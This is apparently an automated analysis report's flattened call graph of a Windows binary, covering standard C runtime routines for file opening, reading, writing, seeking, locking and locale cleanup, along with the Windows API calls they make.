__cftoe2_l 9 API calls 6693->6695 6700 d75b0c 6694->6700 6699 d75a74 __wsopen_helper 6695->6699 6697 d75ab7 6774 d75ae0 6697->6774 6699->6680 6701 d75b2c 6700->6701 6778 d78a18 6701->6778 6703 d75c7f 6704 d71e99 __invoke_watson 8 API calls 6703->6704 6705 d7625e 6704->6705 6708 d75a43 __wsopen_helper 103 API calls 6705->6708 6706 d75b48 6706->6703 6707 d75b82 6706->6707 6714 d75ba5 6706->6714 6809 d71c8f 6707->6809 6710 d76278 6708->6710 6710->6697 6712 d71cc3 __cftoe2_l 58 API calls 6713 d75b94 6712->6713 6716 d71e89 __cftoe2_l 9 API calls 6713->6716 6715 d75c63 6714->6715 6722 d75c41 6714->6722 6717 d71c8f __write 58 API calls 6715->6717 6718 d75b9e 6716->6718 6719 d75c68 6717->6719 6718->6697 6720 d71cc3 __cftoe2_l 58 API calls 6719->6720 6721 d75c75 6720->6721 6723 d71e89 __cftoe2_l 9 API calls 6721->6723 6785 d76d16 6722->6785 6723->6703 6725 d75d0f 6726 d75d3c 6725->6726 6727 d75d19 6725->6727 6803 d759bb 6726->6803 6729 d71c8f __write 58 API calls 6727->6729 6730 d75d1e 6729->6730 6732 d71cc3 __cftoe2_l 58 API calls 6730->6732 6731 d75ddc GetFileType 6735 d75de7 GetLastError 6731->6735 6736 d75e29 6731->6736 6734 d75d28 6732->6734 6733 d75daa GetLastError 6812 d71ca2 6733->6812 6739 d71cc3 __cftoe2_l 58 API calls 6734->6739 6740 d71ca2 __dosmaperr 58 API calls 6735->6740 6817 d76fac 6736->6817 6739->6718 6741 d75e0e CloseHandle 6740->6741 6743 d75dcf 6741->6743 6744 d75e1c 6741->6744 6742 d759bb ___createFile 3 API calls 6745 d75d9f 6742->6745 6748 d71cc3 __cftoe2_l 58 API calls 6743->6748 6747 d71cc3 __cftoe2_l 58 API calls 6744->6747 6745->6731 6745->6733 6749 d75e21 6747->6749 6748->6703 6749->6743 6750 d76002 6750->6703 6753 d761d5 CloseHandle 6750->6753 6755 d759bb ___createFile 3 API calls 6753->6755 6757 d761fc 6755->6757 6756 d71c8f __write 58 API calls 6769 d75ec8 6756->6769 6758 d7608c 6757->6758 6759 d76204 GetLastError 6757->6759 6758->6703 6760 d71ca2 __dosmaperr 58 API calls 6759->6760 6761 d76210 6760->6761 6909 d76ebf 6761->6909 6763 d72a2a 70 API calls __read_nolock 6763->6769 6764 d75ed0 6764->6769 6835 d7897e 6764->6835 6850 d786ed 6764->6850 6768 d7607f 6770 d7897e __close_nolock 61 API calls 6768->6770 6769->6750 6769->6763 6769->6764 6769->6768 6772 d77054 60 API calls __lseeki64_nolock 6769->6772 6881 d77d99 6769->6881 6771 d76086 6770->6771 6773 d71cc3 __cftoe2_l 58 API calls 6771->6773 6772->6769 6773->6758 6775 d75ae6 6774->6775 6776 d75b0a 6774->6776 7031 d7702e LeaveCriticalSection 6775->7031 6776->6699 6779 d78a37 6778->6779 6780 d78a22 6778->6780 6779->6706 6781 d71cc3 __cftoe2_l 58 API calls 6780->6781 6782 d78a27 6781->6782 6783 d71e89 __cftoe2_l 9 API calls 6782->6783 6784 d78a32 6783->6784 6784->6706 6786 d76d22 __wsopen_helper 6785->6786 6787 d744b7 __mtinitlocknum 58 API calls 6786->6787 6788 d76d33 6787->6788 6789 d7442f __lock 58 API calls 6788->6789 6790 d76d38 __wsopen_helper 6788->6790 6794 d76d46 6789->6794 6790->6725 6792 d76e26 6793 d74869 __calloc_crt 58 API calls 6792->6793 6797 d76e2f 6793->6797 6794->6792 6795 d76dc6 EnterCriticalSection 6794->6795 6796 d7442f __lock 58 API calls 6794->6796 6801 d76e94 6794->6801 6802 d740a2 __getstream InitializeCriticalSectionAndSpinCount 6794->6802 6918 d76dee 6794->6918 6795->6794 6798 d76dd6 LeaveCriticalSection 6795->6798 6796->6794 6797->6801 6921 d76c88 6797->6921 6798->6794 6930 d76eb6 6801->6930 6802->6794 6804 d759c6 ___crtIsPackagedApp 6803->6804 6805 d75a21 CreateFileW 6804->6805 6806 d759ca GetModuleHandleW GetProcAddress 6804->6806 6807 d75a3f 6805->6807 6808 d759e7 6806->6808 6807->6731 6807->6733 6807->6742 6808->6807 6810 d736f3 __getptd_noexit 58 API calls 6809->6810 6811 d71c94 6810->6811 6811->6712 6813 d71c8f __write 58 API calls 6812->6813 6814 d71cab _free 6813->6814 6815 d71cc3 __cftoe2_l 58 API calls 6814->6815 6816 d71cbe 6815->6816 6816->6743 6818 d77014 6817->6818 6819 d76fb8 6817->6819 6820 d71cc3 __cftoe2_l 58 API calls 6818->6820 6819->6818 6821 d76fda 6819->6821 6822 d77019 6820->6822 6823 d75e47 6821->6823 6825 d76fff SetStdHandle 6821->6825 6824 d71c8f __write 58 API calls 6822->6824 6823->6750 6823->6769 6826 d77054 6823->6826 6824->6823 6825->6823 6938 d76f45 6826->6938 6828 d77064 6829 d7707d SetFilePointerEx 6828->6829 6830 d7706c 6828->6830 6831 d77095 GetLastError 6829->6831 6834 d75eb1 6829->6834 6832 d71cc3 __cftoe2_l 58 API calls 6830->6832 6833 d71ca2 __dosmaperr 58 API calls 6831->6833 6832->6834 6833->6834 6834->6756 6834->6769 6836 d76f45 __lseeki64_nolock 58 API calls 6835->6836 6839 d7898c 6836->6839 6837 d789e2 6838 d76ebf __free_osfhnd 59 API calls 6837->6838 6843 d789ea 6838->6843 6839->6837 6840 d789c0 6839->6840 6841 d76f45 __lseeki64_nolock 58 API calls 6839->6841 6840->6837 6842 d76f45 __lseeki64_nolock 58 API calls 6840->6842 6844 d789b7 6841->6844 6845 d789cc CloseHandle 6842->6845 6846 d78a0c 6843->6846 6849 d71ca2 __dosmaperr 58 API calls 6843->6849 6847 d76f45 __lseeki64_nolock 58 API calls 6844->6847 6845->6837 6848 d789d8 GetLastError 6845->6848 6846->6764 6847->6840 6848->6837 6849->6846 6851 d77054 __lseeki64_nolock 60 API calls 6850->6851 6852 d7870a 6851->6852 6853 d7876f 6852->6853 6854 d77054 __lseeki64_nolock 60 API calls 6852->6854 6855 d71cc3 __cftoe2_l 58 API calls 6853->6855 6856 d7877a 6853->6856 6858 d78726 6854->6858 6855->6856 6856->6764 6857 d7880e 6863 d77054 __lseeki64_nolock 60 API calls 6857->6863 6877 d78874 6857->6877 6858->6853 6858->6857 6859 d7874f GetProcessHeap HeapAlloc 6858->6859 6860 d7876a 6859->6860 6866 d78783 __setmode_nolock 6859->6866 6862 d71cc3 __cftoe2_l 58 API calls 6860->6862 6861 d77054 __lseeki64_nolock 60 API calls 6861->6853 6862->6853 6864 d78826 6863->6864 6864->6853 6865 d76f45 __lseeki64_nolock 58 API calls 6864->6865 6867 d7883a SetEndOfFile 6865->6867 6872 d787d4 6866->6872 6880 d787e3 __setmode_nolock 6866->6880 6951 d77e88 6866->6951 6868 d7885a 6867->6868 6867->6877 6870 d71cc3 __cftoe2_l 58 API calls 6868->6870 6871 d7885f 6870->6871 6874 d71c8f __write 58 API calls 6871->6874 6873 d71c8f __write 58 API calls 6872->6873 6876 d787d9 6873->6876 6875 d7886a GetLastError 6874->6875 6875->6877 6879 d71cc3 __cftoe2_l 58 API calls 6876->6879 6876->6880 6877->6853 6877->6861 6878 d787f8 GetProcessHeap HeapFree 6878->6877 6879->6880 6880->6878 6882 d77da5 __wsopen_helper 6881->6882 6883 d77db2 6882->6883 6884 d77dc9 6882->6884 6885 d71c8f __write 58 API calls 6883->6885 6886 d77e68 6884->6886 6889 d77ddd 6884->6889 6888 d77db7 6885->6888 6887 d71c8f __write 58 API calls 6886->6887 6892 d77e00 6887->6892 6893 d71cc3 __cftoe2_l 58 API calls 6888->6893 6890 d77e05 6889->6890 6891 d77dfb 6889->6891 6895 d76c88 ___lock_fhandle 59 API calls 6890->6895 6894 d71c8f __write 58 API calls 6891->6894 6898 d71cc3 __cftoe2_l 58 API calls 6892->6898 6896 d77dbe __wsopen_helper 6893->6896 6894->6892 6897 d77e0b 6895->6897 6896->6769 6899 d77e31 6897->6899 6900 d77e1e 6897->6900 6901 d77e74 6898->6901 6904 d71cc3 __cftoe2_l 58 API calls 6899->6904 6902 d77e88 __write_nolock 76 API calls 6900->6902 6903 d71e89 __cftoe2_l 9 API calls 6901->6903 6906 d77e2a 6902->6906 6903->6896 6905 d77e36 6904->6905 6907 d71c8f __write 58 API calls 6905->6907 7027 d77e60 6906->7027 6907->6906 6910 d76f2b 6909->6910 6911 d76ecb 6909->6911 6912 d71cc3 __cftoe2_l 58 API calls 6910->6912 6911->6910 6917 d76ef4 6911->6917 6913 d76f30 6912->6913 6914 d71c8f __write 58 API calls 6913->6914 6915 d76f1c 6914->6915 6915->6758 6916 d76f16 SetStdHandle 6916->6915 6917->6915 6917->6916 6933 d74599 LeaveCriticalSection 6918->6933 6920 d76df5 6920->6794 6922 d76c94 __wsopen_helper 6921->6922 6923 d76ce3 EnterCriticalSection 6922->6923 6924 d7442f __lock 58 API calls 6922->6924 6925 d76d09 __wsopen_helper 6923->6925 6926 d76cb9 6924->6926 6925->6801 6927 d76cd1 6926->6927 6928 d740a2 __getstream InitializeCriticalSectionAndSpinCount 6926->6928 6934 d76d0d 6927->6934 6928->6927 6937 d74599 LeaveCriticalSection 6930->6937 6932 d76ebd 6932->6790 6933->6920 6935 d74599 _doexit LeaveCriticalSection 6934->6935 6936 d76d14 6935->6936 6936->6923 6937->6932 6939 d76f50 6938->6939 6940 d76f65 6938->6940 6941 d71c8f __write 58 API calls 6939->6941 6942 d71c8f __write 58 API calls 6940->6942 6944 d76f8a 6940->6944 6943 d76f55 6941->6943 6945 d76f94 6942->6945 6946 d71cc3 __cftoe2_l 58 API calls 6943->6946 6944->6828 6948 d71cc3 __cftoe2_l 58 API calls 6945->6948 6947 d76f5d 6946->6947 6947->6828 6949 d76f9c 6948->6949 6950 d71e89 __cftoe2_l 9 API calls 6949->6950 6950->6947 6952 d77e95 __write_nolock 6951->6952 6953 d77ed4 6952->6953 6954 d77ef3 6952->6954 6985 d77ec9 6952->6985 6956 d71c8f __write 58 API calls 6953->6956 6959 d77f4b 6954->6959 6960 d77f2f 6954->6960 6955 d75770 __cftoe2_l 6 API calls 6957 d786e9 6955->6957 6958 d77ed9 6956->6958 6957->6866 6961 d71cc3 __cftoe2_l 58 API calls 6958->6961 6962 d77f64 6959->6962 6966 d77054 __lseeki64_nolock 60 API calls 6959->6966 6963 d71c8f __write 58 API calls 6960->6963 6965 d77ee0 6961->6965 7010 d76c34 6962->7010 6964 d77f34 6963->6964 6968 d71cc3 __cftoe2_l 58 API calls 6964->6968 6969 d71e89 __cftoe2_l 9 API calls 6965->6969 6966->6962 6971 d77f3b 6968->6971 6969->6985 6970 d77f72 6972 d782cb 6970->6972 7019 d736db 6970->7019 6975 d71e89 __cftoe2_l 9 API calls 6971->6975 6973 d7865e WriteFile 6972->6973 6974 d782e9 6972->6974 6976 d782be GetLastError 6973->6976 6987 d7828b 6973->6987 6977 d7840d 6974->6977 6984 d782ff 6974->6984 6975->6985 6976->6987 6988 d78418 6977->6988 7002 d78502 6977->7002 6980 d78697 6980->6985 6986 d71cc3 __cftoe2_l 58 API calls 6980->6986 6981 d77fdd 6981->6972 6982 d77fed GetConsoleCP 6981->6982 6982->6980 7005 d7801c 6982->7005 6983 d7836e WriteFile 6983->6976 6983->6984 6984->6980 6984->6983 6984->6987 6985->6955 6989 d786c5 6986->6989 6987->6980 6987->6985 6990 d783eb 6987->6990 6988->6980 6988->6987 6992 d7847d WriteFile 6988->6992 6993 d71c8f __write 58 API calls 6989->6993 6994 d783f6 6990->6994 6995 d7868e 6990->6995 6991 d78577 WideCharToMultiByte 6991->6976 6991->7002 6992->6976 6992->6988 6993->6985 6996 d71cc3 __cftoe2_l 58 API calls 6994->6996 6997 d71ca2 __dosmaperr 58 API calls 6995->6997 6998 d783fb 6996->6998 6997->6985 7000 d71c8f __write 58 API calls 6998->7000 6999 d785c6 WriteFile 6999->7002 7003 d78619 GetLastError 6999->7003 7000->6985 7002->6980 7002->6987 7002->6991 7002->6999 7003->7002 7004 d792d3 WriteConsoleW CreateFileW __putwch_nolock 7004->7005 7005->6976 7005->6987 7005->7004 7006 d78105 WideCharToMultiByte 7005->7006 7007 d792bb 60 API calls __write_nolock 7005->7007 7009 d7819a WriteFile 7005->7009 7024 d791b5 7005->7024 7006->6987 7008 d78140 WriteFile 7006->7008 7007->7005 7008->6976 7008->7005 7009->6976 7009->7005 7011 d76c3f 7010->7011 7012 d76c4c 7010->7012 7013 d71cc3 __cftoe2_l 58 API calls 7011->7013 7015 d76c58 7012->7015 7016 d71cc3 __cftoe2_l 58 API calls 7012->7016 7014 d76c44 7013->7014 7014->6970 7015->6970 7017 d76c79 7016->7017 7018 d71e89 __cftoe2_l 9 API calls 7017->7018 7018->7014 7020 d736f3 __getptd_noexit 58 API calls 7019->7020 7021 d736e1 7020->7021 7022 d736ee GetConsoleMode 7021->7022 7023 d717be __lock 58 API calls 7021->7023 7022->6972 7022->6981 7023->7022 7025 d7917b __isleadbyte_l 58 API calls 7024->7025 7026 d791c2 7025->7026 7026->7005 7030 d7702e LeaveCriticalSection 7027->7030 7029 d77e66 7029->6896 7030->7029 7031->6776 7033 d7637d 7032->7033 7040 d76394 7032->7040 7034 d76384 7033->7034 7036 d763a5 7033->7036 7035 d71cc3 __cftoe2_l 58 API calls 7034->7035 7037 d76389 7035->7037 7043 d74bfc 7036->7043 7039 d71e89 __cftoe2_l 9 API calls 7037->7039 7039->7040 7040->6688 7041 d78b0f 60 API calls __towlower_l 7042 d763b0 7041->7042 7042->7040 7042->7041 7044 d74c0d 7043->7044 7050 d74c5a 7043->7050 7045 d736db __write_nolock 58 API calls 7044->7045 7046 d74c13 7045->7046 7047 d74c3a 7046->7047 7051 d77356 7046->7051 7047->7050 7066 d74f1d 7047->7066 7050->7042 7052 d77362 __wsopen_helper 7051->7052 7053 d736db __write_nolock 58 API calls 7052->7053 7054 d7736b 7053->7054 7055 d7739a 7054->7055 7056 d7737e 7054->7056 7057 d7442f __lock 58 API calls 7055->7057 7058 d736db __write_nolock 58 API calls 7056->7058 7059 d773a1 7057->7059 7060 d77383 7058->7060 7078 d773d6 7059->7078 7064 d717be __lock 58 API calls 7060->7064 7065 d77391 __wsopen_helper 7060->7065 7064->7065 7065->7047 7067 d74f29 __wsopen_helper 7066->7067 7068 d736db __write_nolock 58 API calls 7067->7068 7069 d74f33 7068->7069 7070 d7442f __lock 58 API calls 7069->7070 7071 d74f45 7069->7071 7076 d74f63 7070->7076 7072 d74f53 __wsopen_helper 7071->7072 7074 d717be __lock 58 API calls 7071->7074 7072->7050 7073 d74f90 7116 d74fba 7073->7116 7074->7072 7076->7073 7077 d74831 _free 58 API calls 7076->7077 7077->7073 7079 d773e1 ___addlocaleref ___removelocaleref 7078->7079 7081 d773b5 7078->7081 7079->7081 7085 d7715c 7079->7085 7082 d773cd 7081->7082 7115 d74599 LeaveCriticalSection 7082->7115 7084 d773d4 7084->7060 7086 d771d5 7085->7086 7094 d77171 7085->7094 7087 d77222 7086->7087 7088 d74831 _free 58 API calls 7086->7088 7091 d78d75 ___free_lc_time 58 API calls 7087->7091 7109 d7724b 7087->7109 7089 d771f6 7088->7089 7092 d74831 _free 58 API calls 7089->7092 7090 d771a2 7093 d771c0 7090->7093 7103 d74831 _free 58 API calls 7090->7103 7095 d77240 7091->7095 7097 d77209 7092->7097 7098 d74831 _free 58 API calls 7093->7098 7094->7086 7094->7090 7099 d74831 _free 58 API calls 7094->7099 7100 d74831 _free 58 API calls 7095->7100 7096 d772aa 7101 d74831 _free 58 API calls 7096->7101 7102 d74831 _free 58 API calls 7097->7102 7104 d771ca 7098->7104 7105 d77197 7099->7105 7100->7109 7107 d772b0 7101->7107 7108 d77217 7102->7108 7110 d771b5 7103->7110 7111 d74831 _free 58 API calls 7104->7111 7106 d78c12 ___free_lconv_mon 58 API calls 7105->7106 7106->7090 7107->7081 7112 d74831 _free 58 API calls 7108->7112 7109->7096 7113 d74831 58 API calls _free 7109->7113 7114 d78d0e ___free_lconv_num 58 API calls 7110->7114 7111->7086 7112->7087 7113->7109 7114->7093 7115->7084 7119 d74599 LeaveCriticalSection 7116->7119 7118 d74fc1 7118->7071 7119->7118 7121 d71fdc 7120->7121 7122 d71ffb LeaveCriticalSection 7120->7122 7121->7122 7123 d71fe3 7121->7123 7122->6662 7126 d74599 LeaveCriticalSection 7123->7126 7125 d71ff8 7125->6662 7126->7125 7128 d7149c __wsopen_helper 7127->7128 7129 d714df 7128->7129 7130 d714d7 __wsopen_helper 7128->7130 7133 d714b2 _memset 7128->7133 7140 d71f5e 7129->7140 7130->6610 7134 d71cc3 __cftoe2_l 58 API calls 7133->7134 7136 d714cc 7134->7136 7137 d71e89 __cftoe2_l 9 API calls 7136->7137 7137->7130 7141 d71f90 EnterCriticalSection 7140->7141 7142 d71f6e 7140->7142 7143 d714e5 7141->7143 7142->7141 7144 d71f76 7142->7144 7146 d712b0 7143->7146 7145 d7442f __lock 58 API calls 7144->7145 7145->7143 7147 d712e6 7146->7147 7150 d712cb _memset 7146->7150 7160 d71519 7147->7160 7148 d712d6 7149 d71cc3 __cftoe2_l 58 API calls 7148->7149 7158 d712db 7149->7158 7150->7147 7150->7148 7152 d71326 7150->7152 7151 d71e89 __cftoe2_l 9 API calls 7151->7147 7152->7147 7154 d71437 _memset 7152->7154 7163 d72873 7152->7163 7170 d72a2a 7152->7170 7238 d72752 7152->7238 7258 d72897 7152->7258 7157 d71cc3 __cftoe2_l 58 API calls 7154->7157 7157->7158 7158->7151 7161 d71fcd __wfsopen 2 API calls 7160->7161 7162 d7151f 7161->7162 7162->7130 7164 d72892 7163->7164 7165 d7287d 7163->7165 7164->7152 7166 d71cc3 __cftoe2_l 58 API calls 7165->7166 7167 d72882 7166->7167 7168 d71e89 __cftoe2_l 9 API calls 7167->7168 7169 d7288d 7168->7169 7169->7152 7171 d72a62 7170->7171 7172 d72a4b 7170->7172 7174 d7319a 7171->7174 7179 d72a9c 7171->7179 7173 d71c8f __write 58 API calls 7172->7173 7176 d72a50 7173->7176 7175 d71c8f __write 58 API calls 7174->7175 7177 d7319f 7175->7177 7178 d71cc3 __cftoe2_l 58 API calls 7176->7178 7181 d71cc3 __cftoe2_l 58 API calls 7177->7181 7184 d72a57 7178->7184 7180 d72aa4 7179->7180 7188 d72abb 7179->7188 7182 d71c8f __write 58 API calls 7180->7182 7183 d72ab0 7181->7183 7185 d72aa9 7182->7185 7186 d71e89 __cftoe2_l 9 API calls 7183->7186 7184->7152 7189 d71cc3 __cftoe2_l 58 API calls 7185->7189 7186->7184 7187 d72ad0 7190 d71c8f __write 58 API calls 7187->7190 7188->7184 7188->7187 7191 d72aea 7188->7191 7192 d72b08 7188->7192 7189->7183 7190->7185 7191->7187 7193 d72af5 7191->7193 7194 d748b1 __malloc_crt 58 API calls 7192->7194 7196 d76c34 __read_nolock 58 API calls 7193->7196 7195 d72b18 7194->7195 7197 d72b20 7195->7197 7198 d72b3b 7195->7198 7199 d72c09 7196->7199 7200 d71cc3 __cftoe2_l 58 API calls 7197->7200 7202 d77054 __lseeki64_nolock 60 API calls 7198->7202 7201 d72c82 ReadFile 7199->7201 7206 d72c1f GetConsoleMode 7199->7206 7203 d72b25 7200->7203 7204 d72ca4 7201->7204 7205 d73162 GetLastError 7201->7205 7202->7193 7207 d71c8f __write 58 API calls 7203->7207 7204->7205 7212 d72c74 7204->7212 7208 d72c62 7205->7208 7209 d7316f 7205->7209 7210 d72c33 7206->7210 7211 d72c7f 7206->7211 7207->7184 7216 d71ca2 __dosmaperr 58 API calls 7208->7216 7220 d72c68 7208->7220 7213 d71cc3 __cftoe2_l 58 API calls 7209->7213 7210->7211 7214 d72c39 ReadConsoleW 7210->7214 7211->7201 7212->7220 7221 d72cd9 7212->7221 7222 d72f46 7212->7222 7217 d73174 7213->7217 7214->7212 7215 d72c5c GetLastError 7214->7215 7215->7208 7216->7220 7218 d71c8f __write 58 API calls 7217->7218 7218->7220 7219 d74831 _free 58 API calls 7219->7184 7220->7184 7220->7219 7224 d72d45 ReadFile 7221->7224 7230 d72dc6 7221->7230 7222->7220 7228 d7304c ReadFile 7222->7228 7225 d72d66 GetLastError 7224->7225 7234 d72d70 7224->7234 7225->7234 7226 d72e83 7232 d72e33 MultiByteToWideChar 7226->7232 7233 d77054 __lseeki64_nolock 60 API calls 7226->7233 7227 d72e73 7231 d71cc3 __cftoe2_l 58 API calls 7227->7231 7229 d7306f GetLastError 7228->7229 7237 d7307d 7228->7237 7229->7237 7230->7220 7230->7226 7230->7227 7230->7232 7231->7220 7232->7215 7232->7220 7233->7232 7234->7221 7235 d77054 __lseeki64_nolock 60 API calls 7234->7235 7235->7234 7236 d77054 __lseeki64_nolock 60 API calls 7236->7237 7237->7222 7237->7236 7239 d7275d 7238->7239 7244 d72772 7238->7244 7240 d71cc3 __cftoe2_l 58 API calls 7239->7240 7242 d72762 7240->7242 7241 d7276d 7241->7152 7243 d71e89 __cftoe2_l 9 API calls 7242->7243 7243->7241 7244->7241 7245 d727a7 7244->7245 7305 d765a7 7244->7305 7247 d72873 __flush 58 API calls 7245->7247 7248 d727bb 7247->7248 7272 d72916 7248->7272 7250 d727c2 7250->7241 7251 d72873 __flush 58 API calls 7250->7251 7252 d727e5 7251->7252 7252->7241 7253 d72873 __flush 58 API calls 7252->7253 7254 d727f1 7253->7254 7254->7241 7255 d72873 __flush 58 API calls 7254->7255 7256 d727fe 7255->7256 7257 d72873 __flush 58 API calls 7256->7257 7257->7241 7259 d728a6 7258->7259 7263 d728a2 _memmove 7258->7263 7260 d728ad 7259->7260 7265 d728c0 _memset 7259->7265 7261 d71cc3 __cftoe2_l 58 API calls 7260->7261 7262 d728b2 7261->7262 7264 d71e89 __cftoe2_l 9 API calls 7262->7264 7263->7152 7264->7263 7265->7263 7266 d728f7 7265->7266 7267 d728ee 7265->7267 7266->7263 7269 d71cc3 __cftoe2_l 58 API calls 7266->7269 7268 d71cc3 __cftoe2_l 58 API calls 7267->7268 7270 d728f3 7268->7270 7269->7270 7271 d71e89 __cftoe2_l 9 API calls 7270->7271 7271->7263 7273 d72922 __wsopen_helper 7272->7273 7274 d72946 7273->7274 7275 d7292f 7273->7275 7277 d72a0a 7274->7277 7280 d7295a 7274->7280 7276 d71c8f __write 58 API calls 7275->7276 7279 d72934 7276->7279 7278 d71c8f __write 58 API calls 7277->7278 7281 d7297d 7278->7281 7282 d71cc3 __cftoe2_l 58 API calls 7279->7282 7283 d72985 7280->7283 7284 d72978 7280->7284 7289 d71cc3 __cftoe2_l 58 API calls 7281->7289 7296 d7293b __wsopen_helper 7282->7296 7286 d729a7 7283->7286 7287 d72992 7283->7287 7285 d71c8f __write 58 API calls 7284->7285 7285->7281 7288 d76c88 ___lock_fhandle 59 API calls 7286->7288 7290 d71c8f __write 58 API calls 7287->7290 7291 d729ad 7288->7291 7292 d7299f 7289->7292 7293 d72997 7290->7293 7294 d729d3 7291->7294 7295 d729c0 7291->7295 7299 d71e89 __cftoe2_l 9 API calls 7292->7299 7297 d71cc3 __cftoe2_l 58 API calls 7293->7297 7300 d71cc3 __cftoe2_l 58 API calls 7294->7300 7298 d72a2a __read_nolock 70 API calls 7295->7298 7296->7250 7297->7292 7301 d729cc 7298->7301 7299->7296 7302 d729d8 7300->7302 7308 d72a02 7301->7308 7303 d71c8f __write 58 API calls 7302->7303 7303->7301 7306 d748b1 __malloc_crt 58 API calls 7305->7306 7307 d765bc 7306->7307 7307->7245 7311 d7702e LeaveCriticalSection 7308->7311 7310 d72a08 7310->7296 7311->7310 7315 d71932 7312->7315 7314 d717d9 7316 d7193e __wsopen_helper 7315->7316 7317 d7442f __lock 51 API calls 7316->7317 7318 d71945 7317->7318 7319 d719fe __cinit 7318->7319 7320 d71973 DecodePointer 7318->7320 7335 d71a4c 7319->7335 7320->7319 7322 d7198a DecodePointer 7320->7322 7328 d7199a 7322->7328 7324 d71a5b __wsopen_helper 7324->7314 7326 d719a7 EncodePointer 7326->7328 7327 d71a43 7329 d71a4c 7327->7329 7330 d717a8 __mtinitlocknum 3 API calls 7327->7330 7328->7319 7328->7326 7331 d719b7 DecodePointer EncodePointer 7328->7331 7332 d71a59 7329->7332 7340 d74599 LeaveCriticalSection 7329->7340 7330->7329 7334 d719c9 DecodePointer DecodePointer 7331->7334 7332->7314 7334->7328 7336 d71a52 7335->7336 7337 d71a2c 7335->7337 7341 d74599 LeaveCriticalSection 7336->7341 7337->7324 7339 d74599 LeaveCriticalSection 7337->7339 7339->7327 7340->7332 7341->7337 7467 d78bc0 7468 d78bcc __wsopen_helper 7467->7468 7469 d78c03 __wsopen_helper 7468->7469 7470 d7442f __lock 58 API calls 7468->7470 7471 d78be0 7470->7471 7472 d773d6 __updatetlocinfoEx_nolock 58 API calls 7471->7472 7473 d78bf0 7472->7473 7475 d78c09 7473->7475 7478 d74599 LeaveCriticalSection 7475->7478 7477 d78c10 7477->7469 7478->7477 7553 d72460 7554 d72497 7553->7554 7555 d7248a 7553->7555 7557 d75770 __cftoe2_l 6 API calls 7554->7557 7556 d75770 __cftoe2_l 6 API calls 7555->7556 7556->7554 7559 d724a7 __except_handler4 7557->7559 7558 d725bf 7559->7558 7560 d72574 __except_handler4 7559->7560 7565 d724fe __IsNonwritableInCurrentImage 7559->7565 7560->7558 7561 d725af 7560->7561 7562 d75770 __cftoe2_l 6 API calls 7560->7562 7563 d75770 __cftoe2_l 6 API calls 7561->7563 7562->7561 7563->7558 7571 d72722 RtlUnwind 7565->7571 7566 d725d6 7568 d75770 __cftoe2_l 6 API calls 7566->7568 7567 d7253c __except_handler4 7567->7566 7569 d75770 __cftoe2_l 6 API calls 7567->7569 7570 d725e6 __except_handler4 7568->7570 7569->7566 7571->7567 7817 d7a92c 7820 d7a94d 7817->7820 7819 d7a948 7821 d7a9b7 7820->7821 7822 d7a958 7820->7822 7888 d7ae9e 7821->7888 7822->7821 7823 d7a95d 7822->7823 7825 d7a962 7823->7825 7826 d7a97b 7823->7826 7834 d7b058 7825->7834 7828 d7a99e 7826->7828 7830 d7a985 7826->7830 7875 d7a9d3 7828->7875 7853 d7b119 7830->7853 7833 d7a99c 7833->7819 7905 d7c11f 7834->7905 7837 d7b09d 7840 d7b0b5 7837->7840 7841 d7b0a5 7837->7841 7838 d7b08d 7839 d71cc3 __cftoe2_l 58 API calls 7838->7839 7842 d7b092 7839->7842 7917 d7bfa7 7840->7917 7843 d71cc3 __cftoe2_l 58 API calls 7841->7843 7845 d71e89 __cftoe2_l 9 API calls 7842->7845 7846 d7b0aa 7843->7846 7849 d7b099 7845->7849 7847 d71e89 __cftoe2_l 9 API calls 7846->7847 7847->7849 7848 d7b0e8 7848->7849 7926 d7af6c 7848->7926 7851 d75770 __cftoe2_l 6 API calls 7849->7851 7852 d7a976 7851->7852 7852->7819 7854 d7c11f __fltout2 58 API calls 7853->7854 7855 d7b147 7854->7855 7856 d7b161 7855->7856 7857 d7b14e 7855->7857 7859 d7b17c 7856->7859 7860 d7b169 7856->7860 7858 d71cc3 __cftoe2_l 58 API calls 7857->7858 7862 d7b153 7858->7862 7864 d7bfa7 __fptostr 58 API calls 7859->7864 7861 d71cc3 __cftoe2_l 58 API calls 7860->7861 7863 d7b16e 7861->7863 7865 d71e89 __cftoe2_l 9 API calls 7862->7865 7866 d71e89 __cftoe2_l 9 API calls 7863->7866 7867 d7b1a8 7864->7867 7868 d7b15a 7865->7868 7866->7868 7867->7868 7870 d7b1ee 7867->7870 7873 d7b1c8 7867->7873 7869 d75770 __cftoe2_l 6 API calls 7868->7869 7872 d7b214 7869->7872 7955 d7ad4d 7870->7955 7872->7833 7874 d7af6c __cftof2_l 58 API calls 7873->7874 7874->7868 7876 d74bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7875->7876 7877 d7a9f8 7876->7877 7878 d7aa0f 7877->7878 7879 d7aa18 7877->7879 7880 d71cc3 __cftoe2_l 58 API calls 7878->7880 7882 d7aa21 7879->7882 7885 d7aa35 7879->7885 7881 d7aa14 7880->7881 7884 d71e89 __cftoe2_l 9 API calls 7881->7884 7883 d71cc3 __cftoe2_l 58 API calls 7882->7883 7883->7881 7887 d7aa30 _memset __alldvrm __cftoa_l _strrchr 7884->7887 7885->7887 7987 d7ad2f 7885->7987 7887->7833 7889 d7c11f __fltout2 58 API calls 7888->7889 7890 d7aed0 7889->7890 7891 d7aee7 7890->7891 7892 d7aed7 7890->7892 7894 d7aeee 7891->7894 7895 d7aef8 7891->7895 7893 d71cc3 __cftoe2_l 58 API calls 7892->7893 7896 d7aedc 7893->7896 7897 d71cc3 __cftoe2_l 58 API calls 7894->7897 7899 d7bfa7 __fptostr 58 API calls 7895->7899 7898 d71e89 __cftoe2_l 9 API calls 7896->7898 7897->7896 7903 d7aee3 7898->7903 7900 d7af38 7899->7900 7901 d7ad4d __cftoe2_l 58 API calls 7900->7901 7900->7903 7901->7903 7902 d75770 __cftoe2_l 6 API calls 7904 d7af68 7902->7904 7903->7902 7904->7833 7906 d7c148 ___dtold 7905->7906 7933 d7c3bd 7906->7933 7911 d7c1a0 7914 d71e99 __invoke_watson 8 API calls 7911->7914 7912 d7c18a 7913 d75770 __cftoe2_l 6 API calls 7912->7913 7915 d7b086 7913->7915 7916 d7c1ac 7914->7916 7915->7837 7915->7838 7918 d7bfcf 7917->7918 7919 d7bfb9 7917->7919 7918->7919 7923 d7bfd5 7918->7923 7920 d71cc3 __cftoe2_l 58 API calls 7919->7920 7921 d7bfbe 7920->7921 7922 d71e89 __cftoe2_l 9 API calls 7921->7922 7925 d7bfc8 _memmove _strlen 7922->7925 7924 d71cc3 __cftoe2_l 58 API calls 7923->7924 7923->7925 7924->7921 